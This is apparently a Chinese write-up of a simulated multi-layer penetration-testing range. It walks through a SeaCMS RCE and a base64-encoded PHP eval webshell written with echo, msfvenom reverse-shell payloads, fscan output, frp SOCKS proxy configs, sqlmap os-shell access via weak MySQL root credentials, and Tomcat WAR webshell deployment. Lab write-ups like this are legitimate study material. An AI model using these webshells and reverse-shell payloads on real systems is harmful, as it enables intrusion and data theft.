Java教程

2021-11-3实战模拟环境(海洋cms+rce写shell+udf文件流+sqlmap-d登录getsh+fscan绕过+tomcatwar部署getshell+三重网+openconnect)

本文主要是介绍2021-11-3实战模拟环境(海洋cms+rce写shell+udf文件流+sqlmap-d登录getsh+fscan绕过+tomcatwar部署getshell+三重网+openconnect),对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

最近真的很忙,老板不仅要我们加班,还不给钱,整天吹嘘996是福报,我已经决定要跳槽了,我觉得以后去当红队打hvv也不错。要么就去渗透,要么安fu,反正是真的不想在这种垃圾公司荒废人生了……我最近了一个工控的ctf,一个百度安全比赛,还有就是这个,这个只能kali,就很限制,环境我准备的很不好……只给了2个提示,1.要从10.2.2.97进去,2.最后是一个三层网络8个flag要拿下dc,flag其实还是次要的,主要是dc.恶心的地方是,这个网有自重启动和防护能力,每过一段时间刷新后门全部没掉……所以免杀和安防还有规避检测花了很大功夫……

一、外网打点

先用oopenconnect连接进去

分配本机ip:

Password:
POST https://183.129.189.62:4434/auth
得到了 CONNECT 响应:HTTP/1.1 200 CONNECTED
CSTP 已连接。DPD 90,持久连接(Keepalive)32400
Connected as 10.2.1.83, using SSL, with DTLS in progress
DTLS 握手失败:资源临时不可用,请重试。

nmap扫描,发现10.2.2.97开着22和80,hydra爆破不出来22,访问80,发现是海洋cms

whatweb探测:无法得到详细版本,只能一个一个测试……

whatweb 10.2.2.97
http://10.2.2.97 [200 OK] Apache[2.4.7], Bootstrap[3.3.5], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.7 (Ubuntu)], IP[10.2.2.97], JQuery[1.11.3], PHP[5.5.9-1ubuntu4.25], Script, Title[海洋CMS], X-Powered-By[PHP/5.5.9-1ubuntu4.25], X-UA-Compatible[IE=edge]

找了很多海洋cms的漏洞利用,这篇文章不错:

Seacms漏洞_Grey的博客-CSDN博客_seacms漏洞

探测信息发现了很奇怪的信息,怀疑做了反向代理,因为ifconfig测出来ip不是10.2.2.97,而是10.20.20.31 

拿下一个flag:

开始写shell,发现貌似system(‘echo(一句话木马)>shell.php’)写不进去,然后想着是nc或者wget,sc下载本地msf木马,但是貌似不太行,那只能写shell了。听大表哥说是6.53版本限制了rce的长度,一般用这两个方法写shell:

 说实话下图这个poc我是真的想不到

 

华丽的分割线——————————————————————————

由于网络变化,本机ip变为10.2.0.19  ,第一个目标变为10.2.2.16

我这里用的是第一张图片写的shell,发现居然之前大表哥可以我不行……果然自己还是菜鸡用echo写吧(o(╥﹏╥)o)。写shell如下:

蚁剑连接getshell:居然返回数据为空!!!!!我惊呆了,明明已经写进去一句话木马了呀!检查之后发现post函数被过滤了!我tm居然这里有个waf!那怎么办?绕过呗。。。参考:

渗透tip-----命令执行写入webshell - Shadown-PQ - 博客园

echo "PD9waHAgZXZhbCgkX1BPU1RbMV0pOyA/Pg==" | base64 -d >2.php

二、第一层内网横移10.10.20

基本信息收集

 当前ip是10.10.20.31,(网络变化了所以ip变动,这次我确信是反向代理了,本地还开了3306,但是外网nmap扫不到,可能是白名单了或者waf,ps查看进程发现没什么杀软貌似……)

msf反弹shell进去(有条件可以免杀)

msfvenom -p  linux/x64/shell/reverse_tcp lhost=10.2.0.19 lport=4444 -f elf -o shell

 use exploit/multi/handler

第一次生成shell无法得到交互式meterpreter,换payload继续:

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.2.0.19 LPORT=4445 -f elf > shell2.elf

Active sessions
===============

No active sessions.

msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.2.0.19
lhost => 10.2.0.19
msf5 exploit(multi/handler) > set lport 4445
lport => 4445
msf5 exploit(multi/handler) >run

 派生到cs,但是猛然发现cs上线linux主机比较麻烦……frpc流量特征明显,于是想着直接免杀fscan扫描……

fscan -h 10.10.20.0/24   很好这个时候又无回显,存到一个txt里面吧! -o 1.txt

然后动作太大(或许是网络原因),链接断了,我想不会我被发现了吧!

10.10.20.1:80 open
10.10.20.1:22 open
10.10.20.31:80 open
10.10.20.166:3306 open
10.10.20.100:80 open
10.10.20.231:3306 open
10.10.20.88:8009 open
10.10.20.88:8080 open
[+] mysql:10.10.20.166:3306:root 123456
[+] mysql:10.10.20.231:3306:root 123456
[*] WebTitle:http://10.10.20.1         code:200 len:9      title:海洋CMS
[*] WebTitle:http://10.10.20.31        code:200 len:9      title:海洋CMS
[*] WebTitle:http://10.10.20.100       code:200 len:12     title:后台系统
[*] WebTitle:http://10.10.20.88:8080   code:200 len:20     title:Apache Tomcat/8.0.43

发现2台机子有点意思:

[+] mysql:10.10.20.166:3306:root 123456
[+] mysql:10.10.20.231:3306:root 123456

直接访问不通,这个时候只能代理了……

frpc的两个配置文件如下:

[common]
bind_addr = 0.0.0.0
bind_port = 7000
dashboard_addr = 0.0.0.0
dashboard_port = 7001
dashboard_user = root
dashboard_pwd = 123456
token = 00253c8fcf9ae01

frpc

[common]
server_addr = 10.2.0.19
server_port = 7000
token = 00253c8fcf9ae01
pool_count = 5
health_check_type = tcp
health_check_interval_s = 100
[test]
remote_port = 12345
plugin = socks5
use_encryption = true
use_compression = true
plugin_user = admin
plugin_passwd = 123456

 

 proxychains设置

 nmap验证代理是否有效:有效3306开了

cobaltstrike-4.3$ proxychains nmap 10.10.20.166
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.80 ( https://nmap.org ) at 2021-11-04 18:45 CST
|S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.166:80-<--timeout
|S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.166:587-<--timeout
|S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.166:8080-<--timeout
|S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.166:143-<--timeout
|S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.166:53-<--timeout
|S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.166:554-<--timeout
|S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.166:1720-<--timeout
|S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.166:3306-<><>-OK
|S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.166:445-<--timeout
|S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.166:113-<--timeout
|S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.166:995-<--timeout

 代理mysql无痕登录10.10.20.231    mysql -h localhost -u root -p

发现root的密码hash,破解之:

MySQL [mysql]> select * from user;
+--------------+------+-------------------------------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+--------+-----------------------+
| Host         | User | Password                                  | Select_priv | Insert_priv | Update_priv | Delete_priv | Create_priv | Drop_priv | Reload_priv | Shutdown_priv | Process_priv | File_priv | Grant_priv | References_priv | Index_priv | Alter_priv | Show_db_priv | Super_priv | Create_tmp_table_priv | Lock_tables_priv | Execute_priv | Repl_slave_priv | Repl_client_priv | Create_view_priv | Show_view_priv | Create_routine_priv | Alter_routine_priv | Create_user_priv | Event_priv | Trigger_priv | Create_tablespace_priv | ssl_type | ssl_cipher | x509_issuer | x509_subject | max_questions | max_updates | max_connections | max_user_connections | plugin | authentication_string |
+--------------+------+-------------------------------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+--------+-----------------------+
| localhost    | root | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | Y           | Y           | Y           | Y           | Y           | Y         | Y           | Y             | Y            | Y         | Y          | Y               | Y          | Y          | Y            | Y          | Y                     | Y                | Y            | Y               | Y                | Y                | Y              | Y                   | Y                  | Y                | Y          | Y            | Y                      |          |            |             |              |             0 |           0 |               0 |                    0 |        |                       |
| 9d231610406a | root | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | Y           | Y           | Y           | Y           | Y           | Y         | Y           | Y             | Y            | Y         | Y          | Y               | Y          | Y          | Y            | Y          | Y                     | Y                | Y            | Y               | Y                | Y                | Y              | Y                   | Y                  | Y                | Y          | Y            | Y                      |          |            |             |              |             0 |           0 |               0 |                    0 |        |                       |
| 127.0.0.1    | root | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | Y           | Y           | Y           | Y           | Y           | Y         | Y           | Y             | Y            | Y         | Y          | Y               | Y          | Y          | Y            | Y          | Y                     | Y                | Y            | Y               | Y                | Y                | Y              | Y                   | Y                  | Y                | Y          | Y            | Y                      |          |            |             |              |             0 |           0 |               0 |                    0 |        |                       |
| ::1          | root | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | Y           | Y           | Y           | Y           | Y           | Y         | Y           | Y             | Y            | Y         | Y          | Y               | Y          | Y          | Y            | Y          | Y                     | Y                | Y            | Y               | Y                | Y                | Y              | Y                   | Y                  | Y                | Y          | Y            | Y                      |          |            |             |              |             0 |           0 |               0 |                    0 |        |                       |
| localhost    |      |                                           | N           | N           | N           | N           | N           | N         | N           | N             | N            | N         | N          | N               | N          | N          | N            | N          | N                     | N                | N            | N               | N                | N                | N              | N                   | N                  | N                | N          | N            | N                      |          |            |             |              |             0 |           0 |               0 |                    0 |        | NULL                  |
| 9d231610406a |      |                                           | N           | N           | N           | N           | N           | N         | N           | N             | N            | N         | N          | N               | N          | N          | N            | N          | N                     | N                | N            | N               | N                | N                | N              | N                   | N                  | N                | N          | N            | N                      |          |            |             |              |             0 |           0 |               0 |                    0 |        | NULL                  |
| %            | root | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | Y           | Y           | Y           | Y           | Y           | Y         | Y           | Y             | Y            | Y         | Y          | Y               | Y          | Y          | Y            | Y          | Y                     | Y                | Y            | Y               | Y                | Y                | Y              | Y                   | Y                  | Y                | Y          | Y            | Y                      |          |            |             |              |             0 |           0 |               0 |                    0 |        | NULL                  |
+--------------+------+-------------------------------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+--------+-----------------------+
7 rows in s__H__                                                                                                                                                                            
 ___ ___[']_____ ___ ___  {                                                                                                                                        

sqlmap -d getshell的方法:[猥琐姿势]利用MySQL的root账号从而快速GetShell - 知乎

 proxychains sqlmap -d "mysql://root:123456@10.10.20.231:3306/mysql" -f

[*] starting @ 19:12:24 /2021-11-04/

|S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.231:3306-<><>-OK
[19:12:30] [INFO] connection to MySQL server '10.10.20.231:3306' established
[19:12:30] [INFO] testing MySQL
[19:12:30] [INFO] resumed: [['1']]...
[19:12:30] [INFO] confirming MySQL
[19:12:30] [INFO] resumed: [['1']]...
[19:12:31] [INFO] the back-end DBMS is MySQL
[19:12:31] [INFO] actively fingerprinting MySQL
[19:12:32] [INFO] executing MySQL comment injection fingerprint
back-end DBMS: active fingerprint: MySQL >= 5.5
               comment injection fingerprint: MySQL 5.5.23
[19:12:47] [INFO] connection to MySQL server '10.10.20.231:3306' closed

版本5.5.23的mysql,进去后发现权限低的可怜mysql权限,想着能不能提权udf或者mof,但是在/tmp下就有一个flag8.txt

---
os-shell> ls /tmp
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:
---
flag8.txt
mysql.sock
---
os-shell> cat /tmp/flag8.txt
do you want to retrieve the command standard output? [Y/n/a] y
command standard output: '14326d7730ff9838e1e5e2a778028356'

Mysql-UDF提权_告白的博客-CSDN博客_udf提权

MySQL 漏洞利用与提权 | 国光

弱口令就是tomcat,密码是TOMCAT123,实在是懒得手动提权了,大表哥直接人工给密码

现在最恶心的地方到了!

我居然无法用proxychains代理火狐!别的curl,nmap都可以,就是火狐不行,就算浏览器手动设置了socks5代理走12345端口,也无法访问tomcat的10.10.20.88:8080,那么我该如何拿到10.10.20.88的shell呢??就离谱,离大普……一模一样的步骤和环境……唉……

登录tomcat之后war部署上传一个jsp大马

三、第二层内网核心区域

 打下tomacat之后,二级代理,进入后用nmap扫描,这次就相对没有那么恶心了,普通的内网主机攻击思路,因为各种原因,最后一层的内网不能再写了,,先这样子,,整理思路:

kali------->cms(DMZ)------>mysql(内网1发现密码)---->tomcat(内网1)------->winserver(内网2拿到最终答案)

这篇关于2021-11-3实战模拟环境(海洋cms+rce写shell+udf文件流+sqlmap-d登录getsh+fscan绕过+tomcatwar部署getshell+三重网+openconnect)的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!